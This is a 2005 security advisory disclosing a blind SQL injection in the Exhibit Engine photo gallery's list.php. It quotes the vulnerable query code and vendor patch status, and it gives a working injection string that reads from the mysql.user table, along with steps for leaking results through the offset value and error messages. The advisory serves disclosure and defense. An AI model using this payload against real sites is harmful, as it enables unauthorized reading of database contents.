SEC-CONSULT Security Advisory 20050602-2
=============================================================================
title: Exhibit Engine Blind SQL Injection
program: Exhibit Engine
vulnerable version: 1.22, 1.54 RC4
homepage: photography-on-the.net/ee/
photography-on-the.net/ee/beta/
found: 2005-06-01
by: sk0L / SEC-CONSULT / www.sec-consult.com
=============================================================================
vendor description:
---------------
the Exhibit engine is a PHP/MySQL application for smooth and versatile online photograph
display. it's especially designed to give detailed technical info on each photo, with text
descriptions and gear info, but all that technical data is not required.
vulnerabilty overview:
---------------
SQL injection is possible on various POST parameters in the script list.php. although
there is no way to get any output from UNION statements, there is at least one possibility
to read arbitrary database entries via blind SQL injection.
proof of concept:
---------------
here's the relevant code section from list.php:
---- code -----
$resultcount = mysql_query(
"
SELECT
ee_photo.ee_photo_id
FROM
[...]
WHERE
ee_photo.ee_photo_for_www = 'yes'
AND $search_row LIKE '$wildcard1$keyword$wildcard2'
AND ...
"
);
if (!$resultcount) {
$queryname = "resultcount";
include("db_error.php");
}
$total = mysql_num_rows($resultcount);
$how_many = count($count_total);
if ($offset>$how_many)
{$offset = $how_many;
}
$fetchlist = mysql_query(
"
SELECT
$q0,$q1,...,$q43
FROM
ee_photo,
[...]
ee_order_to_exhibition
WHERE
ee_photo.ee_photo_for_www = 'yes'
[...]
AND ee_exhibition.ee_exhibition_pass = '$pass'
ORDER
by $sort_row $order
LIMIT
$offset,$perpage
"
);
---- /code ----
we can inject SQL into the variables $search_row, $sort_row, $order and
$perpage without the need to escape any quotes. unfortunately, UNIONs can
be put into $rearch_row only, and as $search_row is used in both queries
with a different number of columns, this will inevitably produce an error.
we can use blind sql injection, though:
* set $offset=1
* put injection string into $search_row, e.g.:
search_row=ee_photo.ee_photo_exif_iso%3D1+AND+1%3D2+UNION+SELECT+user+FROM+mysql.user+WHERE+user+LIKE+0x254125+/*+
* if we get 1 (TRUE), offset will be set to 1, FALSE will set it to 0.
* now we still have to produce an error in the second query by
specifying some insane $order or $sort_row. the last part of the
SQL error message will be echoed by Exhibit, so we get the value of
$offset.
it should be relatively easy to code an exploit for this (sorry but i don't have
the time atm).
vulnerable versions:
---------------
Exhibit Engine v1.22 is definitely vulnerable. 1.54 RC4 seems to be vulnerable
too, although exploitation may differ slightly.
it is very likely that the vulnerability exists in most other versions of
Exhibit Engine.
vendor status:
---------------
vendor notified: 2005-06-01
vendor response: immediately
patch available: 2005-06-02
Pekka Saarinen has published a workaround for all current versions of
Exhibit Engine. It is available at:
photography-on-the.net/forum/showthread.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bernhard Mueller / www.sec-consult.com /
SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::
~ ___ ___
~ | |=|_.' .'| .'| .'|=|`. .'|
~ `. | .' | .' .' .' | | `. .' |
==== `.|=|`. | |=|.: | | | | | | ======
~ ___ | `.| | |'. `. | | .' | | ___
~ `._|=|___||___| |_| `.|=|.' |___|=|_.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-